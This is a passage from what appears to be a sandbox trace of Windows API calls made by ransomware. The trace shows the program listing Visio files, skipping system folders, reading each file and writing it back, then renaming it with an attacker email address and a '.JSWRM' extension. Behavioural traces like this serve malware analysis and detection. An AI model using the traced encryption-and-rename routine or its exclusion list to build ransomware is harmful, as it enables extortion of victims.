lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.672] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23554) returned 1 [0147.672] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.672] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5c00, lpOverlapped=0x0) returned 1 [0147.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.675] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5c00, lpOverlapped=0x0) returned 1 [0147.675] CloseHandle (hObject=0x314) returned 1 [0147.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.677] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1abcabc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1abcabc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x16084, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNME_U.VSSX", cAlternateFileName="DTLNME~1.VSS")) returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2=".") returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="..") returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="...") returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="windows") returned -1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="recovery") returned -1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="perflogs") returned -1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="documents and settings") returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="system volume information") returned -1 [0147.677] lstrcmpiW (lpString1="DTLNME_U.VSSX", lpString2="msocache") returned -1 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.679] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=90244) returned 1 [0147.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.679] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x16080, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x16080, lpOverlapped=0x0) returned 1 [0147.687] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.687] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x16080, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x16080, lpOverlapped=0x0) returned 1 [0147.688] CloseHandle (hObject=0x314) returned 1 [0147.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5b7a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNME_U.VSTX", cAlternateFileName="DTLNME~2.VST")) returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2=".") returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="..") returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="...") returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="windows") returned -1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="recovery") returned -1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="perflogs") returned -1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="documents and settings") returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="system volume information") returned -1 [0147.689] lstrcmpiW (lpString1="DTLNME_U.VSTX", lpString2="msocache") returned -1 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.691] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23418) returned 1 [0147.691] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.691] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5b70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5b70, lpOverlapped=0x0) returned 1 [0147.696] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.696] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5b70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5b70, lpOverlapped=0x0) returned 1 [0147.696] CloseHandle (hObject=0x314) returned 1 [0147.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.697] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2930e76, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2930e76, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x295718d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x402ba, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DVCALL_M.VSSX", cAlternateFileName="DVCALL~1.VSS")) returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2=".") returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="..") returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="...") returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="windows") returned -1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="recovery") returned -1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="perflogs") returned -1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="documents and settings") returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="system volume information") returned -1 [0147.698] lstrcmpiW (lpString1="DVCALL_M.VSSX", lpString2="msocache") returned -1 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVCALL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVCALL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.699] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=262842) returned 1 [0147.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.699] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.713] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.713] CloseHandle (hObject=0x314) returned 1 [0147.714] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.715] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37a533b, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x37a533b, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x37a533b, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3e89c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DVCALL_U.VSSX", cAlternateFileName="DVCALL~2.VSS")) returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2=".") returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="..") returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="...") returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="windows") returned -1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="recovery") returned -1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="perflogs") returned -1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="documents and settings") returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="system volume information") returned -1 [0147.715] lstrcmpiW (lpString1="DVCALL_U.VSSX", lpString2="msocache") returned -1 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVCALL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVCALL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVCALL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.717] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=256156) returned 1 [0147.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.718] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.729] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.729] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.730] CloseHandle (hObject=0x314) returned 1 [0147.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DVCALL_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dvcall_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.731] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x283f5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DWGCNV_M.VSTX", cAlternateFileName="DWGCNV~2.VST")) returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2=".") returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="..") returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="...") returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="windows") returned -1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="recovery") returned -1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="perflogs") returned -1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="documents and settings") returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="system volume information") returned -1 [0147.731] lstrcmpiW (lpString1="DWGCNV_M.VSTX", lpString2="msocache") returned -1 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.732] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=164853) returned 1 [0147.732] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.732] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, 